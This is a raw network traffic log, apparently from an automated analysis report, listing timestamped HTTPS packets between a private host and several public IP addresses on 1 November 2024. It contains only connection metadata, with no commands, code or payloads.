                                                                                        Nov 1, 2024 13:46:10.683578014 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.683612108 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.683618069 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.683630943 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.683661938 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.683672905 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.684675932 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.684716940 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.684722900 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.684726954 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.684767008 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.684767962 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.684776068 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.684804916 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.684808969 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.684854984 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.684883118 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.684890032 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.684894085 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.684926987 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.684927940 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.684933901 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.684963942 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.684967995 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.684999943 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.685040951 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.685045958 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.685760021 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.685810089 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.685815096 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.695458889 CET49762443192.168.2.435.190.80.1
                                                                                        Nov 1, 2024 13:46:10.706351995 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.706461906 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.706499100 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.706552029 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.706630945 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.706674099 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.706718922 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.706777096 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.706995964 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.707043886 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.707223892 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.707278967 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.707294941 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.707442045 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.707459927 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.726485014 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.787687063 CET4434976235.190.80.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.788142920 CET49762443192.168.2.435.190.80.1
                                                                                        Nov 1, 2024 13:46:10.788227081 CET4434976235.190.80.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.788276911 CET49762443192.168.2.435.190.80.1
                                                                                        Nov 1, 2024 13:46:10.789449930 CET49764443192.168.2.435.190.80.1
                                                                                        Nov 1, 2024 13:46:10.789518118 CET4434976435.190.80.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.789581060 CET49764443192.168.2.435.190.80.1
                                                                                        Nov 1, 2024 13:46:10.790487051 CET49764443192.168.2.435.190.80.1
                                                                                        Nov 1, 2024 13:46:10.790513039 CET4434976435.190.80.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.801135063 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.801202059 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.801230907 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.801246881 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.801261902 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.801295042 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.801299095 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.801304102 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.801350117 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.801419973 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.801562071 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.801595926 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.801600933 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.801661968 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.801700115 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.801704884 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.802304983 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.802359104 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.802364111 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.802403927 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.802405119 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.802413940 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.802444935 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.802448988 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.802522898 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.803153038 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.803199053 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.803247929 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.803289890 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.803478003 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.803530931 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.804094076 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.804137945 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.804238081 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.804284096 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.804363966 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.804403067 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.805248022 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.805274963 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.805294991 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.805299997 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.805329084 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.919950008 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.919994116 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.920017004 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.920031071 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.920078993 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.920133114 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.920185089 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.920303106 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.920350075 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.920526981 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.920572042 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.920650005 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.920696020 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.921056986 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.921127081 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.921186924 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.921228886 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.921242952 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.921300888 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.921346903 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.921585083 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.921627045 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.921710968 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.921762943 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.921906948 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.921940088 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.921947002 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.921960115 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.921992064 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.922030926 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.922066927 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.922383070 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.922396898 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:11.397069931 CET4434976435.190.80.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:11.444389105 CET49764443192.168.2.435.190.80.1
                                                                                        Nov 1, 2024 13:46:11.491471052 CET49764443192.168.2.435.190.80.1
                                                                                        Nov 1, 2024 13:46:11.491530895 CET4434976435.190.80.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:11.492897987 CET4434976435.190.80.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:11.493314981 CET49764443192.168.2.435.190.80.1
                                                                                        Nov 1, 2024 13:46:11.543340921 CET49764443192.168.2.435.190.80.1
                                                                                        Nov 1, 2024 13:46:11.543342113 CET49764443192.168.2.435.190.80.1
                                                                                        Nov 1, 2024 13:46:11.543390989 CET4434976435.190.80.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:11.543584108 CET4434976435.190.80.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:11.587384939 CET49764443192.168.2.435.190.80.1
                                                                                        Nov 1, 2024 13:46:11.587439060 CET4434976435.190.80.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:11.644401073 CET49764443192.168.2.435.190.80.1
                                                                                        Nov 1, 2024 13:46:11.689444065 CET4434976435.190.80.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:11.691356897 CET4434976435.190.80.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:11.692567110 CET49764443192.168.2.435.190.80.1
                                                                                        Nov 1, 2024 13:46:11.791785002 CET49764443192.168.2.435.190.80.1
                                                                                        Nov 1, 2024 13:46:11.791827917 CET4434976435.190.80.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:12.928021908 CET49765443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:12.928122044 CET44349765104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:12.928204060 CET49765443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:12.928505898 CET49765443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:12.928555965 CET44349765104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:12.954073906 CET49766443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:12.954183102 CET44349766104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:12.954262972 CET49766443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:12.955430031 CET49766443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:12.955468893 CET44349766104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:13.559192896 CET44349766104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:13.561371088 CET49766443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:13.561417103 CET44349766104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:13.561816931 CET44349766104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:13.565727949 CET44349765104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:13.577961922 CET49766443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:13.578094006 CET44349766104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:13.578246117 CET49765443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:13.578306913 CET44349765104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:13.578768969 CET44349765104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:13.584495068 CET49766443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:13.585184097 CET49765443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:13.585290909 CET44349765104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:13.585486889 CET49765443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:13.627351046 CET44349765104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:13.631331921 CET44349766104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:13.718043089 CET44349766104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:13.718139887 CET44349766104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:13.718210936 CET49766443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:13.727909088 CET44349765104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:13.727994919 CET44349765104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:13.728053093 CET44349765104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:13.728115082 CET49765443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:13.764233112 CET49766443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:13.764302015 CET44349766104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:13.764801025 CET49765443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:13.764848948 CET44349765104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:13.796113014 CET49767443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:13.796175957 CET44349767104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:13.796264887 CET49767443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:13.796539068 CET49767443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:13.796569109 CET44349767104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:14.390583992 CET44349767104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:14.390892029 CET49767443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:14.390944958 CET44349767104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:14.391272068 CET44349767104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:14.392235994 CET49767443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:14.392323971 CET44349767104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:14.392379045 CET49767443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:14.435354948 CET44349767104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:14.442142963 CET49767443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:14.525593996 CET44349767104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:14.525660038 CET44349767104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:14.525736094 CET49767443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:14.526492119 CET49767443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:14.526530027 CET44349767104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:15.082637072 CET49768443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:15.082698107 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:15.082865000 CET49768443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:15.083416939 CET49768443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:15.083435059 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:15.231344938 CET49769443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:15.231395006 CET44349769104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:15.231456041 CET49769443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:15.231750965 CET49769443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:15.231764078 CET44349769104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:15.692178011 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:15.692455053 CET49768443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:15.692507982 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:15.692836046 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:15.693195105 CET49768443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:15.693286896 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:15.693367958 CET49768443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:15.693470001 CET49768443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:15.693517923 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:15.693599939 CET49768443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:15.693644047 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:15.850363970 CET44349769104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:15.850625992 CET49769443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:15.850651026 CET44349769104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:15.851198912 CET44349769104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:15.851628065 CET49769443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:15.851722956 CET44349769104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:15.851752043 CET49769443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:15.895375967 CET44349769104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:15.905879974 CET49769443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:15.990626097 CET44349769104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:15.990727901 CET44349769104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:15.990798950 CET49769443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:15.991767883 CET49769443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:15.991785049 CET44349769104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.005738020 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.005781889 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.005820990 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.005846024 CET49768443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:16.005851030 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.005908966 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.005944014 CET49768443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:16.006519079 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.006551981 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.006581068 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.006604910 CET49768443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:16.006620884 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.006649017 CET49768443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:16.010348082 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.010402918 CET49768443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:16.010421991 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.065464973 CET49768443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:16.123393059 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.123452902 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.123477936 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.123505116 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.123528957 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.123557091 CET49768443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:16.123600960 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.123631001 CET49768443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:16.123651981 CET49768443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:16.123708963 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.123819113 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.123853922 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.123874903 CET49768443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:16.123888969 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.123939037 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.123989105 CET49768443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:16.124250889 CET49768443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:16.124300003 CET44349768104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.146671057 CET49770443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:16.146730900 CET44349770104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.146800995 CET49770443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:16.147120953 CET49770443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:16.147152901 CET44349770104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.763407946 CET44349770104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.763801098 CET49770443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:16.763850927 CET44349770104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.764194012 CET44349770104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.764590979 CET49770443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:16.764667034 CET44349770104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.764861107 CET49770443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:16.811336994 CET44349770104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.904632092 CET44349770104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.904695034 CET44349770104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:16.904767036 CET49770443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:16.923007011 CET49770443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:16.923064947 CET44349770104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:23.825267076 CET49771443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:23.825328112 CET44349771104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:23.825392008 CET49771443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:23.826014042 CET49771443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:23.826028109 CET44349771104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:24.445161104 CET44349771104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:24.445580006 CET49771443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:24.445600986 CET44349771104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:24.445921898 CET44349771104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:24.446331978 CET49771443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:24.446392059 CET44349771104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:24.446520090 CET49771443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:24.446597099 CET49771443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:24.446616888 CET44349771104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:24.446758032 CET49771443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:24.446785927 CET44349771104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:24.775810957 CET44349771104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:24.775888920 CET44349771104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:24.775962114 CET49771443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:24.775985956 CET44349771104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:24.776158094 CET44349771104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:24.776206017 CET49771443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:24.776210070 CET44349771104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:24.776221037 CET44349771104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:24.776253939 CET49771443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:24.776989937 CET49771443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:24.777002096 CET44349771104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:24.791606903 CET49772443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:24.791640043 CET44349772188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:24.791702032 CET49772443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:24.791919947 CET49773443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:24.791960001 CET44349773188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:24.792020082 CET49773443192.168.2.4188.114.97.3
